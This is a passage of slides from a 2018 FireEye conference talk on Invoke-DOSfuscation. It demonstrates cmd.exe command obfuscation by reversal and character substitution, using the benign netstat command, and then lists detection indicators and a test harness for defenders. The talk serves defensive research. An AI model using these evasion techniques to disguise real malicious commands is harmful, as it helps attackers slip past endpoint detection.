Reverse
Payload Obfuscation 3 of 4: Reversal
Reversing is similar to FORcoding, but has
simpler indexing with FOR loop's /L argument.
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 177: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/177.jpg)
• cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO
set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:~-12%"
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO
set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%"
177
Payload Obfuscation 3 of 4: Reversal
FORcoding
Reverse
Reversing is similar to FORcoding, but has
simpler indexing with FOR loop's /L argument.
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 178: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/178.jpg)
• cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO
set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:~-12%"
178
• ==1
• EQU 1
• LEQ 1
• LSS 2
https://ss64.com/nt/if.html
Payload Obfuscation 3 of 4: Reversal
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 179: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/179.jpg)
• cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO
set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:~-12%"
179
Payload Obfuscation 3 of 4: Reversal
C:\> echo %final%
!final!netstat /ano
C:\> echo %final:~-12%
netstat /ano
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 180: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/180.jpg)
• cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO
set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:~7%"
180
Payload Obfuscation 3 of 4: Reversal
C:\> echo %final%
!final!netstat /ano
C:\> echo %final:~7%
netstat /ano
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 181: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/181.jpg)
• cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO
set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:*final!=%"
181
C:\> echo %final%
!final!netstat /ano
C:\> echo %final:~7%
netstat /ano
C:\> echo %final:*final!=%
netstat /ano
Payload Obfuscation 3 of 4: Reversal
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 182: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/182.jpg)
• cmd /v /r "set command=netstat /ano&&CALL %command%"
182
Payload Obfuscation 4 of 4: FINcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 183: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/183.jpg)
• cmd /v /r "set command=neZsZaZ /ano&&CALL %command%"
183
Payload Obfuscation 4 of 4: FINcoding t → Z
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 184: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/184.jpg)
• cmd /v /r "set command=neZsZaZ /ano&&set sub1=!command:Z=t!&&CALL
%command%"
184
Z t
Payload Obfuscation 4 of 4: FINcoding t → Z
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 185: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/185.jpg)
• cmd /v /r "set command=neZsZaZ /ano&&set sub1=!command:Z=t!&&CALL
%sub1%"
185
Z t
Payload Obfuscation 4 of 4: FINcoding t → Z
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 186: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/186.jpg)
• cmd /v /r "set command=neZsZ7Z /7no&&set sub1=!command:Z=t!&&set
sub2=!sub1:7=a!&&CALL %sub2%"
186
Z t
7 a
Payload Obfuscation 4 of 4: FINcoding t → Z
a → 7
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 187: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/187.jpg)
• cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set
sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%"
187
Z t
7 a
? n
t → Z
a → 7
n → ?
Payload Obfuscation 4 of 4: FINcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 188: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/188.jpg)
• cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set
sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%"
This same command in Out-FINcodedCommand POC:
• cmd /c "set command=?eZsZ7Z /7?o&&cmd /c set
sub1=%command:Z=t%^&^&cmd /c set sub2=%sub1:7=a%^^^&^^^&cmd /c set
sub3=%sub2:?=n%^^^^^^^&^^^^^^^&cmd /c %sub3%"
188
Payload Obfuscation 4 of 4: FINcoding
• No /V so %var% (not !var!)
•
•
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 189: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/189.jpg)
• cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set
sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%"
This same command in Out-FINcodedCommand POC:
• cmd /c "set command=?eZsZ7Z /7?o&&cmd /c set
sub1=%command:Z=t%^&^&cmd /c set sub2=%sub1:7=a%^^^&^^^&cmd /c set
sub3=%sub2:?=n%^^^^^^^&^^^^^^^&cmd /c %sub3%"
189
Payload Obfuscation 4 of 4: FINcoding
• No /V so %var% (not !var!)
• Multiple cmd.exe invocations
•
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 190: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/190.jpg)
• cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set
sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%"
This same command in Out-FINcodedCommand POC:
• cmd /c "set command=?eZsZ7Z /7?o&&cmd /c set
sub1=%command:Z=t%^&^&cmd /c set sub2=%sub1:7=a%^^^&^^^&cmd /c set
sub3=%sub2:?=n%^^^^^^^&^^^^^^^&cmd /c %sub3%"
190
Payload Obfuscation 4 of 4: FINcoding
• No /V so %var% (not !var!)
• Multiple cmd.exe invocations
• Layered escaping of &&
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 191: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/191.jpg)
• cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set
sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%"
This same command in Out-FINcodedCommand POC:
• cmd /c "set command=?eZsZ7Z /7?o&&cmd /c set
sub1=%command:Z=t%^&^&cmd /c set sub2=%sub1:7=a%^^^&^^^&cmd /c set
sub3=%sub2:?=n%^^^^^^^&^^^^^^^&cmd /c %sub3%"
191
Payload Obfuscation 4 of 4: FINcoding
• No /V so %var% (not !var!)
• Multiple cmd.exe invocations
• Layered escaping of &&
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 192: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/192.jpg)
• cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set
sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%"
This same command in Out-FINcodedCommand POC:
• cmd /c "set command=?eZsZ7Z /7?o&&cmd /c set
sub1=%command:Z=t%^&^&cmd /c set sub2=%sub1:7=a%^^^&^^^&cmd /c set
sub3=%sub2:?=n%^^^^^^^&^^^^^^^&cmd /c %sub3%"
192
• No /V so %var% (not !var!)
• Multiple cmd.exe invocations
• Layered escaping of &&
Payload Obfuscation 4 of 4: FINcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 193: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/193.jpg)
OUTLINE
State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
C:\> Invoke-DOSfuscation Demo
Detecting DOSfuscation
193 COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 194: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/194.jpg)
• Please do not use this tool for evil.
• FIN7, FIN8 & APT32: Please do not use this tool at all ☺
194
DISCLAIMER
https://github.com/danielbohannon/Invoke-DOSfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 195: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/195.jpg)
OUTLINE
State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Demo
C:\> Detecting DOSfuscation
195 COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 196: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/196.jpg)
• Long argument length
• High frequency of obfuscation characters: , ; ^ " ( )
• Rare obfuscation of internal commands:
• C^AL^^L or ;SET,
• Unusual execution flags:
• /V or /R (or /^R)
• Variable substring and replacement syntax:
• %var:~7,1% or !var:~%a,1! or !var:*var=!
196
Detecting DOSfuscation (more details in white paper)
https://moviefiednyc.files.wordpress.com/2013/11/e
0006-ace-ventura-pet-detective-512c7fac5d838.png
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 197: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/197.jpg)
• Suspicious sub-command and stdin child process artifacts
• FOR loop executes sub-command via separate cmd.exe invocation
• Cmd.exe pipeline to add'l binary (e.g. findstr.exe) spawns pre-pipe arguments via
separate cmd.exe invocation with these arguments: cmd.exe /S /D /c" set"
197
Detecting DOSfuscation (more details in white paper)
Double whitespace
No space between /c & "
Whitespace after first "
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 198: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/198.jpg)
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.198
http://smurfitschoolblog.com/wp-content/uploads/2016/10/MissingOutImg_1-900x578.jpg
![Page 199: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/199.jpg)
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.199
http://smurfitschoolblog.com/wp-content/uploads/2016/10/MissingOutImg_1-900x578.jpg
Obfuscation
![Page 200: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/200.jpg)
• Invoke-DOSfuscationTestHarness.psm1
THE module I used to develop detection ideas
• Invoke-DosTestHarness
• Get-DosDetectionMatch
• Released 4000 sample obfuscated commands as
.txt & .evtx files for static and dynamic purposes
200
Detecting DOSfuscation – Test Harness FTW!
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 201: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/201.jpg)
• Attackers are using more creative command argument obfuscation techniques
• Cmd.exe supports significant obfuscation and encoding capabilities not yet
seen in the wild
• Defenders must match levels of attacker creativity with detection creativity
201
Key Takeaways
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 202: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/202.jpg)
• FireEye Advanced Practices Team
• Nick Carr, Matthew Dunwoody, Ben Withnell
• My wife: Paige
• 9 months research & hunting (500+ hours)
• 320 hours Invoke-DOSfuscation tool development
• 100 hours slide/presentation development & 100 hours white paper
202
Credit Where Credit Is Due
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 203: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/203.jpg)
• Daniel Bohannon
• Twitter :: @danielhbohannon
• Blog :: http://danielbohannon.com
• Code: https://github.com/danielbohannon/Invoke-DOSfuscation
• White paper: https://www.fireeye.com/blog/threat-
research/2018/03/dosfuscation-exploring-obfuscation-and-detection-
techniques.html
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.203
Thanks! Questions?